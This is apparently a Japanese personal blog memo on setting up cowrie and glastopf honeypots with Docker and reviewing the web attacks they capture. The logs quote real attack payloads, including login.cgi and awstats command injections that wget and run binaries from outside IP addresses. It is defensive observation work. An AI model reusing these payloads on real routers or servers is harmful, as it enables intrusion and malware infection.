初心者
セキュリティ

ハニーポッド設置してみた

長期休みがあったので、
ハニーポッド観察記録という本をちょっと読みまして、
ひとまず設置してみただけの自分用メモ。
昔から設置したくて仕方なかった。
cowrie、glastopfを入れました。
設置時間コマンド叩いてる時間は10分もかかってないです。docker便利です。

これから監視していきたいです。

docker

そもそもdocker入れる

sudo apt-get update
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    software-properties-common \
    emacs
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
   $(lsb_release -cs) \
   stable"

Docker Community Edition

ceも入れる

sudo apt-get update; sudo apt-get install docker-ce

cowrie

ssh専用のハニーポッド設置

https://github.com/micheloosterhof/cowrie

docker pull cowrie/cowrie
bin/cowrie start

動いてるか確認

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

ログを見る
設置したばっかで、まだないけど。

ログのコピー例
docker cp 54f219cb579c:/etc/hoge.txt hoge.txt
ログの部分
/cowrie/cowrie-git/log

dockerに入る例
docker exec -it 54f219cb579c /bin/bash

Ctrl+dでデタッチ

glastopf

web用のハニーポッド設置

git clone https://github.com/mushorg/glastopf.git
cd glastopf
docker build --rm --tag glastopf .
mkdir myhoneypot1
docker run --detach --publish 80:80 --volume myhoneypot1:/opt/myhoneypot glastopf

動いてるか確認

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
2798c8515bf7        glastopf            "glastopf-runner"        3 minutes ago       Up 3 minutes        0.0.0.0:80->80/tcp   relaxed_kilby
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

ログを見るときの例

dockerに入る例
docker exec -it 2798c8515bf7 /bin/bash

Ctrl+dでデタッチ

php系の攻撃ログが多いので省いた時のコマンド。

cat glastopf.log.2018-10-21 | grep -v php | grep -v PMA | grep -v pma | grep -v "GET / on" | grep -v "HEAD / on"

攻撃例

攻撃される側の基礎

LAMP編

Wordpress使った時にphpMyAdminを使ってることが多い。phpMyAdminへの不正アクセスアタックリストというのがあり、「PMA2011」「MyAdmin」「phpMyAdmin3」など分かりやすい名前は片っ端からアクセスして来る。

phpMyAdmin用の攻撃が多いのではぶいて検索する。

cat glastopf.log.2018-09-24 | grep -v php | grep -v PMA | grep -v pma

IP制限するか、URLを違う名前にしておくと良い。

fail2banってのを設定しておくのも有効。自動遮断ツール。
https://knowledge.sakura.ad.jp/7377/

2018-09-23 13:53:42,030 (glastopf.glastopf) 149.56.45.214 requested GET /PMA2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,041 (glastopf.glastopf) 149.56.45.214 requested GET /PMA2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,144 (glastopf.glastopf) 149.56.45.214 requested GET /pma2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,238 (glastopf.glastopf) 149.56.45.214 requested GET /phpmyadmin2/ on 2798c8515bf7:80
2018-09-23 13:53:42,256 (glastopf.glastopf) 149.56.45.214 requested GET /pma2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,270 (glastopf.glastopf) 149.56.45.214 requested GET /phpmyadmin3/ on 2798c8515bf7:80
2018-09-23 13:53:42,336 (glastopf.glastopf) 149.56.45.214 requested POST /PMA2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,438 (glastopf.glastopf) 149.56.45.214 requested POST /PMA2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,466 (glastopf.glastopf) 149.56.45.214 requested POST /pma2011/ on 2798c8515bf7:80
2018-09-23 13:53:42,481 (glastopf.glastopf) 149.56.45.214 requested POST /pma2012/ on 2798c8515bf7:80
2018-09-23 13:53:42,500 (glastopf.glastopf) 149.56.45.214 requested GET /phpmyadmin4/ on 2798c8515bf7:80
2018-09-23 13:53:42,551 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin2/ on 2798c8515bf7:80
2018-09-23 13:53:42,596 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin3/ on 2798c8515bf7:80
2018-09-23 13:53:42,821 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin4/ on 2798c8515bf7:80

[Linux]本番サーバにPHPMyAdminをインストール時、気をつけること
https://akamist.com/blog/archives/635

phpMyAdminへの不正アクセスアタックURLリスト
http://momiage3dau.com/archives/286

IOT機器のマルウェア

D-Linkのルータ「DSL-2750B」って機器に感染するものらしい。

log/glastopf.log.2018-08-15
2018-08-15 21:20:42,441 (glastopf.glastopf) 197.33.83.159 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 21:20:42,984 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 22:51:43,588 (glastopf.glastopf) 179.98.9.15 requested GET / on 2798c8515bf7:80
2018-08-15 22:53:18,342 (glastopf.glastopf) 177.11.140.205 requested GET / on 2798c8515bf7:80
2018-08-15 23:03:47,697 (glastopf.glastopf) 190.186.100.246 requested GET / on 2798c8515bf7:80
2018-08-15 23:33:58,562 (glastopf.glastopf) 41.37.152.8 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 23:33:59,107 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 23:53:57,893 (glastopf.glastopf) 117.50.7.159 requested GET / on 2798c8515bf7:80

https://www.cscloud.co.jp/news/press/201806251426/
http://octahedron.hatenablog.jp/entry/2018/07/25/005946
http://www.itmedia.co.jp/enterprise/articles/1806/21/news055.html

Drupalの脆弱性

Drupalgeddon 2(CVE-2018-7600)
パッチ当てないと乗っ取られる。

2018-10-02 12:15:21,484 (glastopf.glastopf) 149.56.45.214 requested POST /phpmyadmin4/ on 2798c8515bf7:80
2018-10-02 12:51:23,526 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 12:51:24,661 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 13:09:02,419 (glastopf.glastopf) 149.56.45.214 requested GET /PMA2012/ on 2798c8515bf7:80

http://saito.hatenadiary.com/entry/2018/04/16/221531
http://knqyf263.hatenablog.com/entry/2018/04/14/024130

ホームルータへの攻撃

GponForm/diag_Form?images/が気になったので調べたらホームルータへの攻撃。

2018-09-22 00:03:46,231 (glastopf.glastopf) 124.193.236.138 requested GET /phpmyadmin/ on 2798c8515bf7:80
2018-09-22 00:03:49,534 (glastopf.glastopf) 124.193.236.138 requested GET / on 2798c8515bf7:80
2018-09-22 00:21:39,614 (glastopf.glastopf) 152.250.214.68 requested GET / on 2798c8515bf7:80
2018-09-22 01:20:47,636 (glastopf.glastopf) 85.114.255.117 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-09-22 01:57:05,607 (glastopf.glastopf) 78.245.26.247 requested GET / on 2798c8515bf7:80
2018-09-22 02:38:01,835 (glastopf.glastopf) 95.179.183.252 requested GET /pma2012/ on 2798c8515bf7:80
2018-09-22 02:38:01,850 (glastopf.glastopf) 95.179.183.252 requested GET /PMA2012/ on 2798c8515bf7:80

DASAN Network Solutionsのホームルーターを狙った攻撃(CVE-2018-10561)をキャッチ
http://saito.hatenadiary.com/entry/2018/05/07/232548

TODO1

あんまり見ないけども。3日に1回のペースで来てる。

2018-09-25 11:50:00,045 (glastopf.glastopf) 101.132.243.11 requested GET /invoker/JMXInvokerServlet on 2798c8515bf7:80

webdav攻撃?これは2日に1回くらい。

2018-09-26 04:41:02,021 (glastopf.glastopf) 132.232.147.229 requested GET /webdav/ on 2798c8515bf7:80
2018-09-26 18:05:33,271 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-09-28 08:01:58,641 (glastopf.glastopf) 220.167.103.51 requested HEAD /images/banner.png on 2798c8515bf7:80

1週間に1回くらい。

2018-09-28 05:33:46,870 (glastopf.glastopf) 220.189.202.114 requested GET /console on 2798c8515bf7:80
2018-09-28 10:45:21,743 (glastopf.glastopf) 220.167.103.51 requested HEAD /images/sql2008.png on 2798c8515bf7:80

これも3日1回くらい。

2018-09-28 13:14:33,547 (glastopf.glastopf) 220.167.103.51 requested HEAD /static/admin/images/login_logo.png on 2798c8515bf7:80

git?

2018-09-28 14:12:45,193 (glastopf.glastopf) 159.224.109.206 requested GET /.git/HEAD on 2798c8515bf7:80

ストラッツだ。

2018-09-29 11:33:45,020 (glastopf.glastopf) 197.51.209.220 requested GET /struts2-rest-showcase/orders.xhtml on 2798c8515bf7:80
2018-09-29 11:33:45,771 (glastopf.glastopf) 197.51.209.220 requested GET /index.action on 2798c8515bf7:80
2018-09-29 11:33:46,207 (glastopf.glastopf) 197.51.209.220 requested GET /index.do on 2798c8515bf7:80
2018-09-29 12:52:49,237 (glastopf.glastopf) 45.6.188.2 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-09-30 04:39:54,942 (glastopf.glastopf) 47.75.66.180 requested POST /wls-wsat/CoordinatorPortType on 2798c8515bf7:80
2018-09-30 14:21:39,322 (glastopf.glastopf) 190.151.20.83 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-09-30 20:56:33,889 (glastopf.glastopf) 104.168.151.140 requested GET /ashx/globalHandler.ashx on 2798c8515bf7:80
2018-09-30 23:30:49,883 (glastopf.glastopf) 190.2.153.118 requested GET /rgs.mng on 2798c8515bf7:80
2018-10-01 02:17:16,642 (glastopf.glastopf) 54.198.20.169 requested OPTIONS / on 2798c8515bf7:80
2018-10-01 07:55:03,463 (glastopf.glastopf) 159.224.109.206 requested GET /.git/HEAD on 2798c8515bf7:80
2018-10-01 09:08:08,057 (glastopf.glastopf) 104.168.151.140 requested GET /ashx/globalHandler.ashx on 2798c8515bf7:80
2018-10-01 21:35:05,819 (glastopf.glastopf) 104.168.151.140 requested POST /publicHandler.ashx on 2798c8515bf7:80
2018-10-01 22:26:56,284 (glastopf.glastopf) 91.187.223.177 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ on 2798c8515bf7:80
2018-10-01 22:27:00,298 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: <urlopen error timed out>
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 404, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 422, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1184, in do_open
    raise URLError(err)
URLError: <urlopen error timed out>

結構人気だなぁ。

2018-10-02 00:50:31,531 (glastopf.glastopf) 77.157.39.15 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-10-02 00:50:35,542 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: <urlopen error timed out>
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 404, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 422, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1184, in do_open
    raise URLError(err)
URLError: <urlopen error timed out>
2018-10-02 04:51:25,009 (glastopf.glastopf) 185.128.40.182 requested GET /manager/html on 2798c8515bf7:80
2018-10-02 07:23:19,497 (glastopf.glastopf) 104.168.151.140 requested POST /membersHandler.ashx on 2798c8515bf7:80
2018-10-02 08:11:14,291 (glastopf.glastopf) 183.78.180.27 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-10-02 11:55:29,252 (glastopf.glastopf) 124.88.98.98 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://159.89.204.166/d%20-O%20-%3E%20/tmp/ds;sh%20/tmp/ds%27$ on 2798c8515bf7:80
2018-10-02 11:55:29,408 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-10-02 12:51:23,526 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 12:51:24,661 (glastopf.glastopf) 185.234.217.54 requested GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_aja on 2798c8515bf7:80
2018-10-02 21:49:15,523 (glastopf.glastopf) 188.68.59.103 requested GET /robots.txt on 2798c8515bf7:80
2018-10-02 21:49:16,769 (glastopf.glastopf) 188.68.59.103 requested GET /blog/robots.txt on 2798c8515bf7:80
2018-10-02 21:49:17,097 (glastopf.glastopf) 188.68.59.103 requested GET /blog/ on 2798c8515bf7:80
2018-10-02 21:49:17,406 (glastopf.glastopf) 188.68.59.103 requested GET /wordpress/ on 2798c8515bf7:80
2018-10-02 21:49:17,721 (glastopf.glastopf) 188.68.59.103 requested GET /wp/ on 2798c8515bf7:80
2018-10-02 21:49:18,311 (glastopf.glastopf) 188.68.59.103 requested GET /robots.txt on 2798c8515bf7:80
2018-10-02 21:49:19,783 (glastopf.glastopf) 188.68.59.103 requested GET /blog/robots.txt on 2798c8515bf7:80
2018-10-02 22:21:01,794 (glastopf.glastopf) 58.218.213.4 requested GET /index.action on 2798c8515bf7:80
2018-10-02 23:22:11,243 (glastopf.glastopf) 47.75.210.223 requested GET /webdav/ on 2798c8515bf7:80
2018-10-03 01:26:18,562 (glastopf.glastopf) 37.208.52.80 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ on 2798c8515bf7:80
2018-10-03 01:26:22,579 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: <urlopen error timed out>
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 404, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 422, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1184, in do_open
    raise URLError(err)
URLError: <urlopen error timed out>
2018-10-03 03:56:35,650 (glastopf.glastopf) 183.131.83.17 requested GET /manager/html on 2798c8515bf7:80
2018-10-03 07:32:31,183 (glastopf.glastopf) 188.68.59.103 requested GET /admin/images/cal_date_over.gif on 2798c8515bf7:80
2018-10-03 17:48:04,553 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-10-03 19:39:39,887 (glastopf.glastopf) 123.249.13.4 requested GET /index.do on 2798c8515bf7:80
2018-10-03 19:39:41,838 (glastopf.glastopf) 123.249.13.4 requested GET /index.action on 2798c8515bf7:80
2018-10-03 19:39:44,652 (glastopf.glastopf) 123.249.13.4 requested GET /index.jsp on 2798c8515bf7:80
2018-10-03 19:39:44,776 (glastopf.glastopf) 123.249.13.4 requested GET /login.do on 2798c8515bf7:80
2018-10-03 19:39:45,051 (glastopf.glastopf) 123.249.13.4 requested GET /login.action on 2798c8515bf7:80
2018-10-03 19:39:45,260 (glastopf.glastopf) 123.249.13.4 requested GET /login.jsp on 2798c8515bf7:80
2018-10-03 19:39:45,843 (glastopf.glastopf) 123.249.13.4 requested GET /main.jsp on 2798c8515bf7:80
2018-10-03 19:39:45,960 (glastopf.glastopf) 123.249.13.4 requested GET /default.jsp on 2798c8515bf7:80
2018-10-03 19:39:47,085 (glastopf.glastopf) 123.249.13.4 requested GET /register.jsp on 2798c8515bf7:80
2018-10-03 19:39:48,393 (glastopf.glastopf) 123.249.13.4 requested GET /login/login.jsp on 2798c8515bf7:80
2018-10-03 19:39:48,641 (glastopf.glastopf) 123.249.13.4 requested GET /login/indexAction.action on 2798c8515bf7:80
2018-10-03 19:39:50,556 (glastopf.glastopf) 123.249.13.4 requested GET /indexAction.action on 2798c8515bf7:80

お。4日は無い。

cat glastopf.log.2018-10-04 | grep -v php | grep -v PMA | grep -v pma | grep -v "GET / on" | grep -v "HEAD / on"
2018-10-05 05:10:55,508 (glastopf.glastopf) 115.231.219.17 requested GET /manager/html on 2798c8515bf7:80
2018-10-05 19:28:55,485 (glastopf.glastopf) 71.6.158.166 requested GET /robots.txt on 2798c8515bf7:80
2018-10-05 19:28:55,708 (glastopf.glastopf) 71.6.158.166 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-05 19:28:56,184 (glastopf.glastopf) 71.6.158.166 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-05 19:28:56,638 (glastopf.glastopf) 71.6.158.166 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-05 19:34:08,120 (glastopf.glastopf) 149.202.170.88 requested GET /.env on 2798c8515bf7:80
2018-10-05 20:05:18,112 (glastopf.glastopf) 39.106.177.189 requested GET /webdav/ on 2798c8515bf7:80

well-known/security.txtは初めて見た。

2018-10-06 01:22:30,289 (glastopf.glastopf) 118.25.54.65 requested GET /webdav/ on 2798c8515bf7:80
2018-10-06 10:24:17,139 (glastopf.glastopf) 156.236.69.230 requested GET /webdav/ on 2798c8515bf7:80
2018-10-06 19:54:00,194 (glastopf.glastopf) 115.231.219.26 requested GET /manager/html on 2798c8515bf7:80
2018-10-06 21:57:45,357 (glastopf.glastopf) 94.102.49.193 requested GET /robots.txt on 2798c8515bf7:80
2018-10-06 21:57:54,227 (glastopf.glastopf) 94.102.49.193 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-06 21:58:06,712 (glastopf.glastopf) 94.102.49.193 requested GET /favicon.ico on 2798c8515bf7:80

awstats。今更cgi系も。

2018-10-07 00:25:28,788 (glastopf.glastopf) 103.94.234.113 requested GET /webdav/ on 2798c8515bf7:80
2018-10-07 01:37:59,976 (glastopf.glastopf) 186.139.38.211 requested GET /webdav/ on 2798c8515bf7:80
2018-10-07 17:40:10,140 (glastopf.glastopf) 96.68.165.185 requested GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-07 17:40:11,256 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-07 17:40:12,376 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-07 21:55:50,506 (glastopf.glastopf) 183.131.83.112 requested GET /manager/html on 2798c8515bf7:80
2018-10-08 14:09:04,026 (glastopf.glastopf) 185.128.40.182 requested GET /manager/html on 2798c8515bf7:80
2018-10-08 16:47:16,266 (glastopf.glastopf) 183.131.83.169 requested GET /index.action on 2798c8515bf7:80
2018-10-08 18:59:05,722 (glastopf.glastopf) 43.241.252.89 requested GET /webdav/ on 2798c8515bf7:80
2018-10-09 03:37:32,963 (glastopf.glastopf) 185.10.68.123 requested GET /Greetings/Professor/Falken on 2798c8515bf7:80
2018-10-09 04:12:07,565 (glastopf.glastopf) 183.131.83.112 requested GET /manager/html on 2798c8515bf7:80
2018-10-09 16:26:42,457 (glastopf.glastopf) 118.25.139.90 requested GET /webdav/ on 2798c8515bf7:80
2018-10-09 22:44:53,083 (glastopf.glastopf) 58.87.124.178 requested GET /webdav/ on 2798c8515bf7:80
2018-10-09 23:19:14,989 (glastopf.glastopf) 80.82.77.139 requested GET /robots.txt on 2798c8515bf7:80
2018-10-09 23:19:16,050 (glastopf.glastopf) 80.82.77.139 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-09 23:19:16,827 (glastopf.glastopf) 80.82.77.139 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-09 23:19:18,923 (glastopf.glastopf) 80.82.77.139 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-09 23:53:48,378 (glastopf.glastopf) 134.93.17.11 requested GET /manager/html on 2798c8515bf7:80
2018-10-10 07:47:48,273 (glastopf.glastopf) 185.100.87.249 requested POST /sdk on 2798c8515bf7:80
2018-10-10 07:47:48,542 (glastopf.glastopf) 185.100.87.249 requested GET /nmaplowercheck1539157666 on 2798c8515bf7:80
2018-10-10 07:47:49,294 (glastopf.glastopf) 185.100.87.249 requested GET /NmapUpperCheck1539157666 on 2798c8515bf7:80
2018-10-10 07:47:50,274 (glastopf.glastopf) 185.100.87.249 requested GET /Nmap/folder/check1539157666 on 2798c8515bf7:80
2018-10-10 07:47:50,935 (glastopf.glastopf) 185.100.87.249 requested GET /evox/about on 2798c8515bf7:80
2018-10-10 07:47:51,047 (glastopf.glastopf) 185.100.87.249 requested GET /HNAP1 on 2798c8515bf7:80
2018-10-10 13:39:05,576 (glastopf.glastopf) 104.168.151.140 requested GET /Vip/User/Login on 2798c8515bf7:80
2018-10-10 15:34:45,386 (glastopf.glastopf) 122.112.220.223 requested GET /webdav/ on 2798c8515bf7:80
2018-10-10 17:28:27,986 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-10-10 19:15:30,243 (glastopf.glastopf) 119.28.13.87 requested GET /webdav/ on 2798c8515bf7:80
2018-10-10 20:50:18,065 (glastopf.glastopf) 115.231.219.32 requested GET /manager/html on 2798c8515bf7:80
2018-10-10 21:57:50,447 (glastopf.glastopf) 104.168.151.140 requested GET /Vip/User/Login on 2798c8515bf7:80
2018-10-10 22:31:01,655 (glastopf.glastopf) 47.98.42.201 requested GET /webdav/ on 2798c8515bf7:80
2018-10-11 03:26:37,660 (glastopf.glastopf) 59.127.189.160 requested GET /webdav/ on 2798c8515bf7:80
2018-10-11 08:57:23,039 (glastopf.glastopf) 96.68.165.185 requested GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-11 08:57:24,192 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-11 08:57:25,328 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-11 11:28:11,591 (glastopf.glastopf) 185.10.68.123 requested GET /Greetings/Professor/Falken on 2798c8515bf7:80
2018-10-11 18:41:43,400 (glastopf.glastopf) 58.57.152.227 requested GET /HNAP1/ on 2798c8515bf7:80
2018-10-11 22:51:42,379 (glastopf.glastopf) 78.52.57.112 requested HEAD /tmpfs/snap.jpg?usr=user&pwd=user on 2798c8515bf7:80
2018-10-12 12:06:44,362 (glastopf.glastopf) 220.167.103.51 requested HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png on 2798c8515bf7:80
2018-10-12 13:02:02,947 (glastopf.glastopf) 60.191.66.218 requested GET /manager/html on 2798c8515bf7:80
2018-10-12 13:05:38,056 (glastopf.glastopf) 121.57.224.223 requested GET http://www.wujieliulan.com/ on 2798c8515bf7:80
2018-10-12 13:05:39,388 (glastopf.glastopf) 110.167.89.201 requested GET http://www.ip.cn/ on 2798c8515bf7:80
2018-10-12 13:05:41,019 (glastopf.glastopf) 110.167.91.174 requested GET http://www.minghui.org/ on 2798c8515bf7:80
2018-10-12 13:05:43,406 (glastopf.glastopf) 110.167.92.28 requested GET http://www.epochtimes.com/ on 2798c8515bf7:80
2018-10-12 13:05:45,938 (glastopf.glastopf) 182.200.179.5 requested GET http://boxun.com/ on 2798c8515bf7:80
2018-10-12 13:38:59,029 (glastopf.glastopf) 220.173.17.190 requested GET http://www.123cha.com on 2798c8515bf7:80
2018-10-12 21:58:12,599 (glastopf.glastopf) 195.22.22.24 requested GET /?a=<foo> on 2798c8515bf7:80
2018-10-13 00:20:33,221 (glastopf.glastopf) 70.71.234.251 requested HEAD /robots.txt on 2798c8515bf7:80
2018-10-13 12:08:52,718 (glastopf.glastopf) 47.93.233.88 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
